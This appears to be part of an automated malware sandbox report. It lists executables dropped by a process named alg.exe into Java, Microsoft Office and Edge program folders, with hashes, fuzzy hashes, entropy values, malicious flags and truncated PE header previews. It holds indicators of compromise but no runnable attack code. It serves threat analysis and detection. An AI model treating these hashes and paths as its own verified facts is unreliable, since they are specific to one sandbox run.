Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1142272
Entropy (8bit):	5.032984494307393
Encrypted:	false
SSDEEP:	12288:H5/2Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:ZesqjnhMgeiCl7G0nehbGZpbD
MD5:	443F4FA76975338B528ADD541E63BE0C
SHA1:	80C7A730FCB6C072AF42D987E6429959C120B6B7
SHA-256:	A51CBDBED8E422334B9CF0EDB03ADCCAB1B8BF9A8C7DE493EB3E5530FF86D62C
SHA-512:	C046EE8FB5EF604009D1DA0F903890E94B153A8BEB01874D8F749D2713F0F8A79911266A2337AFB442561CE2D9DD08F327394043C11C2B2E2B309D9B06B3F4BA
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1202688
Entropy (8bit):	5.0980563434262995
Encrypted:	false
SSDEEP:	12288:M7AXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:M7AsqjnhMgeiCl7G0nehbGZpbD
MD5:	D446ADC79A6E6153D2272ABC019B478A
SHA1:	CD58B53EF63A4872C8C723C07DF2AB7C4A7E4B82
SHA-256:	8066E04D5B1949FA86E2604F1C53B90126B77219D48F599F0486DF87561FCF43
SHA-512:	4F46C316BAF0013045DEBBEEECCFB9E7956087401288AFD525B17C1C2CC20ECC166748CA86EA660CD57387604C694DF4A9B3E5C1608E591B56D5A680E376FBA4
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......zGG.>&).>&).>&).7^..&).\^(.<&).\^-.3&).\^.=&).M-.?&).M(.7&).>&(.&).\^,..&)._,.:&)._..?&)._+.?&).Rich>&).........PE..L...M.d.................\|...........u............@..................................N..........................................@....0..............................H...T...............................@...............P...P........................text...L{.......\|.................. ..`.rdata.............................@..@.data........ ......................@....rsrc........0......................@..@.reloc...P...@...@..................@...................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1142784
Entropy (8bit):	5.032316847739186
Encrypted:	false
SSDEEP:	12288:5KQiXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:IdsqjnhMgeiCl7G0nehbGZpbD
MD5:	09BDDC5D0EF06F8526BCD29285A726AA
SHA1:	7DB0C4D22835941BDC3B8048B333BB40F56B8A79
SHA-256:	29625FFACB48A62C30475AC358A1FE7CC49F2667BB695BC0D385615A0E8DDB74
SHA-512:	42B195D6A4E1575889FFB3B977693C28A82B112C24AAA6B051DE87625BF79A45E138627F4D0FBE8BEB2AAD99F843EA582C56E1F14A9CC6259167CCD861EC649E
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................... ............... ....@..........................................................................'.......@..h...........................8#..T...........................x"..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......."..............@....rsrc...h....@.......$..............@..@.reloc...P...P...@...0..............@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1298944
Entropy (8bit):	5.249090825327612
Encrypted:	false
SSDEEP:	24576:Ei7l/3roAUsqjnhMgeiCl7G0nehbGZpbD:vl/roAwDmg27RnWGj
MD5:	7C359C64234DEC7907EE1367851A7656
SHA1:	C3A131CFFECF77B13EFA0548655AC6D6E5CBAFF5
SHA-256:	D036103AD903A8273BB56B1411860CE38534A1DBA63032A213E871237FBE7E22
SHA-512:	EAEB0193AA41FBF93F7B1A07E53A280BCA4306B6DF59A18DB98A148738859A21E19B05F6694350FF3C91C12D5FDCD37F8BA4E6289BDB8DF79F4456C61166EB6F
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........n...........................................................................................Rich............................PE..L.....d............................A.............@..........................0......3...................................................D............................e..8............................e..@............................................text...D........................... ..`.rdata..5...........................@..@.data................f..............@....idata...............v..............@..@.00cfg..............................@..@.rsrc...D...........................@..@.reloc...P.......@..................@...........................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1269248
Entropy (8bit):	5.286904740826707
Encrypted:	false
SSDEEP:	12288:B5bfQo2Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:BNfQo2sqjnhMgeiCl7G0nehbGZpbD
MD5:	743A3C8DD902689C8FE19FDC0D4C88BD
SHA1:	7D540F5C8BF2B18090046960339EC22D7E329924
SHA-256:	6AF9C90DC5A78ED601DCFAE10420829C1F3414EB5EC636DCDA0AE80BAF5CA6A1
SHA-512:	6FB48E5D9DD680668F1A5F76D0BD6A18EED2A26C89597116AE9E8AEA97C1685F0454015CCDADFFC9E177533FDEB9A2D8FBC1DFB171E31D67BC59F37071FB0C6E
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X.u.....................\|.......\|.......\|.......\|...?.......................................y.......y.......y.......Rich............................PE..L...-1.e............... ..........................@.................................&R......................................d...........................................8...............................@...............,............................text............................... ..`.rdata..4a.......b..................@..@.data........ ......................@....reloc...`...@...P..................@...........................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1287680
Entropy (8bit):	5.303367773921716
Encrypted:	false
SSDEEP:	12288:VNmt0LDILi2n1Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDR:ALiksqjnhMgeiCl7G0nehbGZpbD
MD5:	337314F0B414072AA604C731996FD3CF
SHA1:	3C8E13D906770F089D1DDC894ADB3CF4667852E0
SHA-256:	660093FA6B21C71937361F0F0F00A4C18ED4FB4A4F9B6148750982AFF760BAFD
SHA-512:	87CEF8804212FA3C21E59EB4D1ACA34A7330898F9E8C5016F0586263EF527248CF0A6AE6509F3BDE81418A202D252165C72CFA4FDE06622D99ADF29BF3D02500
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,3.zhR.)hR.)hR.)a.)`R.). .(nR.). .(wR.). .(oR.)hR.).V.). .(AR.). o)jR.). .(xR.). m)iR.). .(iR.)RichhR.)................PE..L...I.6..................&...H......`........@....@.................................rR........... ...........................Q.......`..(...........................`^..T....................B..........@............P...............................text....$.......&.................. ..`.data........@.....................@....idata..l....P.......2..............@..@.rsrc...(....`.......@..............@..@.reloc...p...p...`...F..............@...................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1287680
Entropy (8bit):	5.303362382282396
Encrypted:	false
SSDEEP:	12288:6Nmt0LDILi2n1Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDR:RLiksqjnhMgeiCl7G0nehbGZpbD
MD5:	21A470A2E9B94BA504C95E0C6DD69B92
SHA1:	DD4D28FA45072F165F21D6AAFEFE2873D0E70A50
SHA-256:	485F43A56A469874994CAFCF36EE47273C38EC552BD3D0F11BA4CB913AB29969
SHA-512:	02DDB6DA069C97032F0119F256F5EF15E9A44D6E2309E67FE0D1BA9426BDB5E5C0BA8E79164F38F8A04907848202D8AD1893B3D1EB9D4C403DD42F2F442119A7
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,3.zhR.)hR.)hR.)a.)`R.). .(nR.). .(wR.). .(oR.)hR.).V.). .(AR.). o)jR.). .(xR.). m)iR.). .(iR.)RichhR.)................PE..L...I.6..................&...H......`........@....@.................................(............ ...........................Q.......`..(...........................`^..T....................B..........@............P...............................text....$.......&.................. ..`.data........@.....................@....idata..l....P.......2..............@..@.rsrc...(....`.......@..............@..@.reloc...p...p...`...F..............@...................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1343488
Entropy (8bit):	5.236049912291806
Encrypted:	false
SSDEEP:	12288:sjuozBMGNUbTOXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDR:YfXsqjnhMgeiCl7G0nehbGZpbD
MD5:	6261039A50ABE38E2B161587BB3D4077
SHA1:	D8B02DE3757C06A260E20501861B1D924D20E081
SHA-256:	F4260F53C40B950AC267ED3626CA48FDC201D06A4C336264B27206E89AEE56C6
SHA-512:	BCD2F49F1BF28EE2E74CB7E12B2D3D4416DDD5818E9A32801B1E2A8E491DA4726BD756F2CCA34DDA1F8A35FBFF4B407E70A53A6E8B91B49D62F295D1EAA728E4
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... .(.d.F.d.F.d.F.m..l.F...B.h.F...E.`.F...C.{.F...G.c.F.d.G...F...N.M.F.....f.F.....e.F...D.e.F.Richd.F.................PE..d....~0/.........."..........P.................@.....................................<.... .......... ...................................... ........ ..(...............................T....................e..(...`d..8............e...............................text............................... ..`.rdata..............................@..@.data...@...........................@....pdata..............................@..@.rsrc...(.... ......................@..@.reloc...p...0...`... ..............@...........................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1496064
Entropy (8bit):	5.577939042743441
Encrypted:	false
SSDEEP:	24576:qbUO42s/EjsqjnhMgeiCl7G0nehbGZpbD:qLnDmg27RnWGj
MD5:	A88149E91D8564A66A7B79330FEAA675
SHA1:	377657B47AC7E20ABA171F1FABF475767555EFB6
SHA-256:	95F9756BD5416D8D9D1FB891C38588D68AD441B52139A7D6DA44993CA14A3464
SHA-512:	ED2B90AC5DADC0EE15D997D59F6C2808B21C10E20B7644C82688F850EBA8EB3C06BFF6E13BB4973FDDCAC72C691163E9F537FCD25A3C542697B2AB1D8A6D02FB
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X..i.v.:.v.:.v.:...;9v.:...;.v.:...;.v.:.v.:.v.:...;$v.:...;4v.:...:.v.:...;.v.:Rich.v.:........................PE..L......m.................0...\|...............@....@.......................... .......?........... ......................................................................T...................`[..........@............p...............................text...l/.......0.................. ..`.data...@'...@.......4..............@....idata..@....p.......L..............@..@.c2r.................\...................rsrc................^..............@..@.reloc...........p...d..............@...................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	52712960
Entropy (8bit):	7.961838866647109
Encrypted:	false
SSDEEP:	1572864:gojL44lyBc+UN0qRsMjDAY9d5o/paLXzHLe:picZmsR3Lo/cnLe
MD5:	02975D93BA9FAD5A924D534B6E934395
SHA1:	F9960540163A2C6AC8F54110EB803649F861432F
SHA-256:	CAD5D9652F422FAF259F1924D511F42B0924B67E4F96B5DF10EA71674B985FDB
SHA-512:	02B26206DFF799EF809E31FF5D45E8627910861E536867CC326D9A656E70E36CAB8F00335385294DAA63FEB775773EC3AAED7A00E64604CB279A039A46825F52
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......LN.../nB./nB./nB.]mC./nB.]kC./nB.TjC./nB.TmC./nB.TkC}/nB.FjC./nB.FkC3/nB.]hC./nB.]jC./nB.]oC?/nB./oBq-nB.TgC./nB.TkC./nB.TnC./nB.T.B./nB.TlC./nBRich./nB........................PE..L...1~............"....!.j(.........p]........(...@...........................$......9%..............................l3..t....3.0.....6.X............................./.p...................../.....h./.@.............(......j3.`....................text...jh(......j(................. ..`.rdata........(......n(.............@..@.data...t.... 4.......4.............@....didat..$.....5.......5.............@....rsrc...X.....6.......5.............@..@.reloc... ...........F..............@...................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4993536
Entropy (8bit):	6.811117977485662
Encrypted:	false
SSDEEP:	98304:JlkkCqyDEY7+o3OBvfGVY+40yalyS+9s/pL+D527BWG:/kkCqaE68eV+0yyE6L+VQBWG
MD5:	270CF4B0D881CD257F07282AC18F9DD0
SHA1:	AC9675AA90F8625F852A95D174AB21C5292CDE8B
SHA-256:	E9CA5366EF322A9EC71936B0DAC765D507909C8EA75D5310C7AE89A843BD48D8
SHA-512:	62937B7B1C30753BF2D42DBE10B63B218F76C0244DEB8E3E7DD82F7AB4CE7DAE8537FB7CA52E6C049C03AF8F807E2E6E349A21CE37B9ABAB37598A94E5C1E294
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........:V@.[8..[8..[8.{);..[8.{)=..[8..!<..[8..!;..[8..!=..[8.\.U..[8.\.E..[8.{)<..[8.{)>..[8.{)9..[8..[9..X8..!=..[8..!1.0^8..!...[8..[...[8..!:..[8.Rich.[8.................PE..L......e..........".... ....Z........%......`+...@..........................pL.......L......................................=......p?.............................<.=.8...................P.:..... .+.@.............+......j=......................text............................. ..`.rdata........+....................@..@.data.........=.......=.............@....rsrc........p?......F?.............@..@.reloc........?......R?.............@...................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1657344
Entropy (8bit):	5.635131415287641
Encrypted:	false
SSDEEP:	24576:IE8DMeflpnIOvYUYsqjnhMgeiCl7G0nehbGZpbD:ItDD9pnIOODmg27RnWGj
MD5:	EDA7DB87E6C814251BF22E75DB8F8CEC
SHA1:	DF1088A32CD08AA3CE3BC7C4B3323D49277A05AE
SHA-256:	C864425BF5400926F18976B532C598AD015BD930FA9A4EB7328737DF738BB0CA
SHA-512:	D376BE16BB461AA7EF97FBD94453444FBE8D762E05284D7EF50E4B56950C3B038923A209123C2131A2A807E8041FEEDE8D5267131F7D4AE60C7F6BD3C6723FE7
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..........J......@!.........@.......................................... .............................................................X........F......................T.......................(...P...@...........@...`............................text............................... ..`.rdata..8...........................@..@.data...XL....... ...d..............@....pdata...F.......H..................@..@.00cfg..8.... ......................@..@.gxfg....*...0...,..................@..@.retplne.....`...........................tls.........p......................@..._RDATA..\...........................@..@.rsrc...X...........................@..@.reloc...P.......@..................@...................................................................................................................................................................................

C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	4364800
Entropy (8bit):	6.748471953084273
Encrypted:	false
SSDEEP:	49152:SB1sstqMHiq8kBfK9a+cOVE/TqEpEepIkRqqUu9wg6KFYso8l8EtDmg27RnWGj:sHzorVmr2ZkRpdJYoljD527BWG
MD5:	0F7ADF53F78470E8CDEBBE6A8A8CE078
SHA1:	45DCC42FB14AC1BA6CB945B310D04EF6B31BBBAE
SHA-256:	2651917BBCFB10A907B02530CC737E16811D4DA8BFC04A82F8EBF0C98BA1A828
SHA-512:	88801C67C8EAD3E5E368D965A31A83D042A5325FE1FB0060A7CFE91C4A771E4B16F9A3D786D295B60A0B4541FE55E09C50F86060882742FACB2FE9F1EAF61B51
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e..........".......'..".......K.........@.............................PD......(C... .....................................................P.... 4.......2..Q..................to..8...................`j..(.....'.@...........0.......`........................text...'.'.......'................. ..`.rdata...A....'..B....'.............@..@.data........./......./.............@....pdata...Q....2..R....0.............@..@.00cfg..0....p3......42.............@..@.gxfg....2....3..4...62.............@..@.retplne......3......j2..................tls..........3......l2.............@...LZMADEC.......3......p2............. ..`_RDATA..\.....4.......2.............@..@malloc_h......4.......2............. ..`.rsrc........ 4.......2.............@..@.reloc... ...0;.......9.............@...................................................................................................

C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1238528
Entropy (8bit):	5.146930008804556
Encrypted:	false
SSDEEP:	12288:X3w1uVdSEjKXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3b:XEyTKsqjnhMgeiCl7G0nehbGZpbD
MD5:	7B8BB4D04CD19AF69AA2F2939A1513E0
SHA1:	F5326B8FE3333D216AF77E40AA109D04364665E4
SHA-256:	E903B8807DAFF8104A70648F17242E347735A8008013EF436E10B59CE320C1F4
SHA-512:	C68DD0AA0DFBD62697816FB00B25AFC573861E9BBE0F61B4EF8B8F4E60F102888FA7FC1C61A86CF606850DB93252451E5602745E713CC0077658AF4567433A79
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."............................@.............................P......<}.... ..................................................]..(....................................W..T...............................@............`..X............................text............................... ..`.rdata..,...........................@..@.data...0............j..............@....pdata...............v..............@..@.00cfg..8...........................@..@.gxfg...P...........................@..@.retplne................................_RDATA..\...........................@..@.rsrc...............................@..@.reloc...P.......@..................@...........................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2354176
Entropy (8bit):	7.049966654581833
Encrypted:	false
SSDEEP:	49152:AhDdVrQ95RW0YEHyWQXE/09Val0GjDmg27RnWGj:AhHYW+HyWKMD527BWG
MD5:	2E272607CBEA10D875D90A573275C4C0
SHA1:	BC7D0BD5A1D9661E3FB6B16AE1AC90BB1A105C5D
SHA-256:	F78C225E3F808A407B6D0171F3E16FB6EF176B4B1908761A308E431E922D9196
SHA-512:	8BC49DB68AA73138B9BDFDB774444EFB557799C0938165FA2FFA5BBFCD7614E589F49DC2AC7E5B20684463D370450F7EEFB884EAF802F60FA4228CF712748D98
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......2...........b.........@.............................`%.......$... .........................................p%......>).......@..................................8.......................(....c..@........... 0..P............................text....0.......2.................. ..`.rdata.......P.......6..............@..@.data...4...........................@....pdata..............................@..@.00cfg..0...........................@..@.gxfg............0..................@..@.retplne.................................tls....!...........................@..._RDATA..\.... ......................@..@malloc_h.....0...................... ..`.rsrc........@......................@..@.reloc.......`......................@...........................................................................................................................................

C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1825280
Entropy (8bit):	7.158479970933056
Encrypted:	false
SSDEEP:	24576:F70E0ZCQZMiU6Rrt9RoctGfmddZsqjnhMgeiCl7G0nehbGZpbD:h0EzQSyRPRoc1RDmg27RnWGj
MD5:	209A5C119B58B0D3FE7443F403A531F8
SHA1:	E083D348D3F9E92028BA72C68F18A5CBA2702984
SHA-256:	DDB9567B0229C9947AE44B2693CE0E9B696656612D56062E357B916997E08ED1
SHA-512:	6F19BA3E8A1F1392130F5D74A95A5030040BE85EDC4BFB31BD2703633C7C3115887B4E257DAC8828F925EF3A5E5CD4AACE13E9C83D891825B8E23CA941BA561C
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..........v.......k.........@.............................0............ ..........................................u......ly....... ..........,....................d..T...................hc..(.......@...........@... ............................text............................... ..`.rdata.............................@..@.data........@......."..............@....pdata..,...........................@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne.................................tls................................@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc........ ......................@..@.reloc.......0......................@...........................................................................................................................................

C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1847808
Entropy (8bit):	7.145468517779918
Encrypted:	false
SSDEEP:	24576:7iD2VmA1YXwHwlklb8boUuWPg2gmsqjnhMgeiCl7G0nehbGZpbD:WD2VmAyiwIb8boQNDmg27RnWGj
MD5:	867EC20D2E5DF2AA19EE40D22219CC6A
SHA1:	B58058230327192D284087E144B352B1D0ABCFD9
SHA-256:	2E07BFC96F22AEDF521D880FCF88FB1D8C9CD266DBE18DE0E46EB13C40297EE6
SHA-512:	66B9A9657952A1E5A23FAAEE5B98ADC2441BD599BAC2525F0C984806D9D675531ED9120D08570D85A61662A3FFF60F4EABE3B4DCE345EAC5639087B323CFCDF5
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..................p.........@.............................p.......{.... .........................................2...........d....`..8....P..........................8......................(.......@...............X...(........................text...4........................... ..`.rdata..\|...........................@..@.data................r..............@....pdata.......P.......n..............@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne..... ...........................tls.........0.......0..............@..._RDATA..\....@.......2..............@..@malloc_h.....P.......4.............. ..`.rsrc...8....`.......6..............@..@.reloc.......p.......B..............@...........................................................................................................................................

C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2853376
Entropy (8bit):	6.95074558301503
Encrypted:	false
SSDEEP:	49152:HfD3zO9ZhBGloizM3HRNr00VDmg27RnWGj:/DaalxzM00VD527BWG
MD5:	5A7E4B0F8F30AD437AB996A534636EFE
SHA1:	ABA8C23F0F105C373C38764108D56F7F3E37F7BD
SHA-256:	55AEABFC19CB303A1648748C55F9627B13F74A365B8A40C145702D8AE1710B56
SHA-512:	5FE3B1D6542FE55AD8855F87289ED8A0466047F11CBD437FB89645CFCB19FB815413E88D0FB1E2F92E1E8B642911C8BD9623938AC05A7073E49D86CA36DB4E1C
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......l...2......@..........@..............................-......+... .................................................h.........!.. ...P ........................8......................(...P...@...............x............................text....k.......l.................. ..`.rdata...............p..............@..@.data...T....p.......^..............@....pdata.......P ......d..............@..@.00cfg..0.... !......* .............@..@.gxfg...P1...0!..2..., .............@..@.retplne.....p!......^ ..................tls..........!......` .............@...LZMADEC.......!......b ............. ..`_RDATA..\.....!......t .............@..@malloc_h......!......v ............. ..`.rsrc.... ....!.."...x .............@..@.reloc........$.......".............@...................................................................................................

C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	4320256
Entropy (8bit):	6.824609007683383
Encrypted:	false
SSDEEP:	49152:gTaRe7mkn5KLvD5qGVC0080pb4tgLUgGEsLABD5wTQh07yrLMLl9YPhmDmg27RnN:rI72LvkrDpbxJRoIMdD527BWG
MD5:	2A5E0C75867AC8CD6B9DA8D051E82279
SHA1:	DDA09F7E775C9C9C64F261022BAD1D2EB601B2DD
SHA-256:	2F18959AB4D3A8E90E128C99C369DF96FD5B06FA98C5D6C47C18E7A02579C203
SHA-512:	2341E4DB013DBE1578AD0DA78AE1A244E46F0EE593A27DAADAD42F88B98E438ACAB05C7DE5FA1D0605D36A67EF0C3B3002B3CE4F8557CAB3FE0FECEE714334FD
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e..........".......,......... k.........@..............................C.....,sB... ..........................................'3......+3.P.....8.x....P6..e..................h.2.T.....................2.(...P"-.@............43.......3. ....................text...E.,.......,................. ..`.rdata..4#....-..$....,.............@..@.data........@4.......4.............@....pdata...e...P6..f...45.............@..@.00cfg..0.....7.......6.............@..@.gxfg...@4....7..6....6.............@..@.retplne......8.......6..................tls....-.... 8.......6.............@...CPADinfo8....08.......6.............@...LZMADEC......@8.......6............. ..`_RDATA..\....`8.......6.............@..@malloc_h.....p8.......6............. ..`.rsrc...x.....8.......6.............@..@.reloc... ...p:.......8.............@...........................................................

C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2062336
Entropy (8bit):	7.097225458443182
Encrypted:	false
SSDEEP:	24576:oW9Jml9mmijviMnF+ZxmQWcbLw8VpsqjnhMgeiCl7G0nehbGZpbD:oWnm5iOMkjmQWkVtDmg27RnWGj
MD5:	81E5164D6556C82373BDE8D1793306DA
SHA1:	BEAD582EFBE06E72ADEBF7F5EA0FC2F57C8565E6
SHA-256:	7CC3CE1A66ADCA08CEC3030892B830E45606C01F1A220D3FEAB828663504B071
SHA-512:	E40E273F03D7BB4010CBB99FBB692C13A332C2AEF836D760DCC37478C88B021CDAC1FAC3E1801FDBB14DBA65A8B26153142043981AF410F42FE00FEDB5ECB87F
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......h...4......P..........@.............................. ..... ..... .................................................Z...................H......................8.......................(...`...@...........(...@............................text....g.......h.................. ..`.rdata...).......*...l..............@..@.data...............................@....pdata..H...........................@..@.00cfg..0....P.......H..............@..@.gxfg...p-...`.......J..............@..@.retplne.............x...................tls.................z..............@...CPADinfo8............\|..............@..._RDATA..\............~..............@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...................................................................................................

C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1801216
Entropy (8bit):	7.166360958642251
Encrypted:	false
SSDEEP:	24576:DwNHwoYhua6MtjRO4qbBJTY6mY1uIgHsqjnhMgeiCl7G0nehbGZpbD:DwNPdQO7BJTfmE8Dmg27RnWGj
MD5:	07E41C8D4EF903D5E981C1B6E46DCA85
SHA1:	76F0FFFAE7BE64A9DB926BFAAC4275CEBE7FC210
SHA-256:	4B4EAA0FA8D6DABBCC4A5DA3CE637C87449F7561B65CAD3E31A43B8811C3D78A
SHA-512:	A744C911FB7D235F87ECE5562B4EA812E169D0F8597F840A59BC7587ACFDFB402E763B5744CE36DD9E83684E2815367B79FB5E960D9EAF1255D8EEAFED70574A
Malicious:	true
Reputation:	unknown
